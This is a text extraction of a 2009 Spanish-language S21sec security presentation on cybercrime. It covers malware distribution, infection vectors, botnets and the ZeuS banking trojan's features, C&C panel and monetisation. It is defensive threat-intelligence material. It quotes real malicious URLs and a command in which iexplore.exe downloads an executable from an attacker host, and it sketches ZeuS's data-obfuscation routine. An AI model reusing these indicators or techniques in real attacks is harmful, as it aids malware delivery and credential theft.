Post on 12-Jun-2015
description
*[ CIBERCRIMEN: FRAUDE Y MALWARE ]
Autor: Mikel Gastesi Urrozmgastesi@s21sec.com
Fecha: 10-07-2009
Confidencialidad
La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización.
Pág. 2
Índice
Pág. 3
Introducción - ¿Cibercrimen?EvoluciónDistribuciónInfecciónBotnets• ZeuS/Zbot
Money, money, money
INTRODUCCIÓN - ¿CIBERCRIMEN?
Pág. 4
¿CIBERCRIMEN?
EVOLUCIÓN (de la mentalidad)
EVOLUCION
1 persona• Ataques dirigidos• Recursos limitados
Grupos profesionales• Ataques indiscriminados/masivos• Muchos recursos técnicos
EVOLUCIÓN
Cambio de objetivos
Inicios: Ataques al servidor• Necesidad de pocos recursos• Mayor conciencia de seguridad
Ahora: Ataque a los clientes• Necesidad de manejar mucha
información• Necesidad de una infraestructura
tecnológica• Poca conciencia de seguridad
EVOLUCIÓN
1 servidor• Búsqueda de vulnerabilidades• Atacante trata de acceder al servidor
N clientes• Vulnerabilidades conocidas• Victima accede al vector de infección• ¿Phishing? → Malware!!!
DISTRIBUCIÓN
DISTRIBUCIÓN
El malware acude a la víctima• SPAM
• Búsqueda y robo de contactos• P2P• Ingeniería social• Descargas con “regalo”
EJ. SPAM
EJ. SPAM
DISTRIBUCIÓN
La víctima acude al malware• Páginas fraudulentas
• Falsos antivirus• Falsas páginas de vídeos
• Páginas comprometidas• Páginas legítimas atacas
indiscriminadamente
EJ. FAKE AV
EJ. FAKE AV
DISTRIBUCIÓN
Página comprometida, ¿cómo?• Nine ball: 40000 páginas
comprometidas• Cuentas FTP• Diccionario/Brute force• SQL injection• RFI• Exploits recientes, 0-days
SQL INJECTION MASIVO
INFECCIÓN
INFECCIÓN
INFECCIÓN
Software vulnerable• Sistema Operativo• Navegador• Complementos
• Flash• PDF...
TODO programa que interactúe con el exterior es una POSIBLE víctima.
UNAS ESTADÍSTICAS... [secunia]
INFECCIÓN
INFECCIÓN
Víctima “vulnerable”• Ejecución de ficheros adjuntos• Doble extensión (.doc______.exe)
Confianza en la página• Codecs
No siempre se está a salvo teniendo todo el software actualizado• 0-days• Ventana de tiempo de los antivirus
INFECCIÓN
Microsoft DirectShow 0-day (msvidctl.dll)
• Páginas comprometidas
• Inyecta 8oy4t.8866.org/aa/go.jpg
• Muchos exploits, entre ellos el 0day
• 2000, 2003 y XP vulnerables
• Ejecuta: C:\[%programfiles%]\Internet Explorer\iexplore.exe "http://milllk.com/wm/svchost.exe"
• Detectado por solamente por 2 AV (VirusTotal)
• Por ahora, v0.1http://www.securityfocus.com/bid/35558http://www.csis.dk/en/news/news.asp?tekstID=799http://www.microsoft.com/technet/security/advisory/972890.mspx
INFECCIÓN
La cadena es tan fuerte como el eslabón más débil
BOTNETS
BOTNETS
BOTNETS
BOTNETS
Uso:• Proxy• Ataques DdoS• Obtención de credenciales• Hosting• SPAM• Supercomputadora• ...
BOTNETS
No solo PCsBotnets ocultas tras Bullet-proof ISP• No responden a avisos de abuso• Alojan paneles de control• Alojan vectores de infección y
malware• Fraudulento
TROYANOS BANCARIOS - ZeuS
TROYANOS BANCARIOS
SilenciososDistribución masivaBotnetRobar credencialesMitB¿Por qué no más? ¡Es gratis!• Control de la máquina• Proxy• …
Programado por humanos• Parámetros• Idioma, user-agent...
TROYANOS BANCARIOS
Actores• Sinowal
• Torpig• Buena ocultación• Generación de dominios mediante
algoritmo• Arrestos
• BankPatch• MitB
• ZeuS• Más sencillo• Ocultación user-mode• ¡El rey del mambo!
ZEUS
Finales 2006
• Simple bot
• ~3000$Principios 2007
• Se hace popular
• ~700$Finales 2007
• Versiones personalizadasMediados 2008
• Vulnerabilidades
• Implementaciones en paralelo2009
• Vulnerabilidades corregidas
• Soporta parcialmente IPv6...
ZEUS – CAMBIOS IMPORTANTES
Corrección de bugs• Mal saneamiento de parámetros
• Escritura de ficheros• ¡Guerra!
10-12-2008 → RC4• Local data requests to the server
and the configuration file can be encrypted with RC4 key depending on your choice
ZEUS
ZEUS
Distribución• SPAM
• Facturas• E-cards• Michael Jackson
• Kits de exploits
ZEUS - CARACTERÍSTICAS
BotActualización configuraciónActualización del binario/etc/hostsSocks proxyInyección HTMLRedirección HTMLCapturas de pantallaCapturas de teclados virtualesCaptura de credencialesRobo certificadosKillOS
ZEUS - TODO
Compatibility with Windows Vista and Windows 7Improved WinAPI hookingRandom generation of configuration files to avoid generic detectionConsole-based builderVersion supporing 64 bit processorsFull IPv6 supportDetailed statistics on antivirus software and firewalls installed on the infected machines
ZEUS
ZEUS - FICHEROS
1.0.x.x
• ntos.exe
• \wnspoem\audio.dll
• \wnspoem\video.dll……1.2.x.x
• sdra64.exe
• \lowsec\local.ds
• \lowsec\audio.ds¿1.3.x.x?
• bootwindows.exe
• \skype32\win32post.dll
• \skype32\win64post.dll
ZEUS
ZEUS
ZEUS
Config file:• Cifrado con RC4• Update binary• Url C&C server• Advanced configuration• Webfilters• WebFakes• WebInjects
ZEUS
Ficheros de datos• Cifrado RC4 al servidor• Cifrado.
For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
ZEUS - C&C
ZEUS - C&C
Instalación: • Siguiente → Siguiente → Final
PHP + mysql • O ficheros
Generador de ficheros de configuración y binarios.Opciones del panel de control
ZEUS - C&C
Instalación: • Siguiente → Siguiente → Final
PHP + mysql • O ficheros
Generador de ficheros de configuración y binarios.Opciones del panel de control
Zeus – C&C
Opciones• Botnet : Bots online• Botnet : Comandos remotos• Logs : Búsqueda• Logs : Ficheros subidos• System : Perfil• System : Opciones
ZEUS
ZEUS
KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la
memoria.• BSOD
ZEUS
KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la
memoria.• BSOD
MONEY, MONEY, MONEY
LUCRO
Crear malware y venderloCrear botnet y alquilarlaObtención de credenciales y venderlasObtención de dinero gracias a las credenciales
LUCRO
LUCRO
LUCRO
LUCRO
LUCRO
TransferenciasCompra de bienes• Físicos• Virtuales
Subastas...deja volar tu imaginación
*[ MUCHAS GRACIAS ]
Pág. 61